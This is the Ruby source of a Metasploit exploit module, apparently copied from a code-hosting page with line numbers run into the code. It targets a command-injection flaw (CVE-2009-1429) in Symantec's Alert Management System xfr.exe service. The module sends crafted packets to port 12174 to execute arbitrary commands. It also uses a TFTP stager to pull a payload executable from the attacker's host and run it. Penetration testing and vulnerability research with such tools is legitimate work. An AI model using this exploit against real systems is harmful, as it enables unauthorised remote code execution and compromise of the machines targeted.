Path: blob/master/modules/exploits/windows/antivirus/ams_xfr.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::CmdStager9include Msf::Exploit::Remote::Tcp10include Msf::Exploit::EXE1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',17'Description' => %q{18Symantec System Center Alert Management System is prone to a remote command-injection vulnerability19because the application fails to properly sanitize user-supplied input.20},21'Author' => [ 'MC' ],22'License' => MSF_LICENSE,23'References' => [24[ 'CVE', '2009-1429' ],25[ 'BID', '34671' ],26[ 'OSVDB', '54157' ],27[ 'ZDI', '09-060' ],28[ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]29],30'Targets' => [31[32'Windows Universal',33{34'Arch' => ARCH_X86,35'Platform' => 'win'36}37]38],39'CmdStagerFlavor' => 'tftp',40'Privileged' => true,41'Platform' => 'win',42'DefaultTarget' => 0,43'DisclosureDate' => '2009-04-28',44'Notes' => {45'Reliability' => UNKNOWN_RELIABILITY,46'Stability' => UNKNOWN_STABILITY,47'SideEffects' => UNKNOWN_SIDE_EFFECTS48}49)50)5152register_options(53[54Opt::RPORT(12174),55OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),56]57)58end5960def windows_stager61print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")62tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']63execute_cmdstager({ temp: '.', tftphost: tftphost })64@payload_exe = generate_payload_exe6566print_status("Attempting to execute the payload...")67execute_command(@payload_exe)68end6970def execute_command(cmd, opts = {})71connect7273len = 2 + cmd.length7475data = [0x00000000].pack('V')76data << len.chr77data << "\x00"78data << cmd + " "79data << "\x00"8081sock.put(data)8283res = sock.get_once8485if (!res)86print_error("Did not received data. Failed?")87else88print_good("Got data, execution successful!")89end9091disconnect92end9394def exploit95unless datastore['CMD'].blank?96print_status("Executing command '#{datastore['CMD']}'")97execute_command(datastore['CMD'])98return99end100101case target['Platform']102when 'win'103windows_stager104else105fail_with(Failure::Unknown, 'Target not supported.')106end107108handler109end110end111112113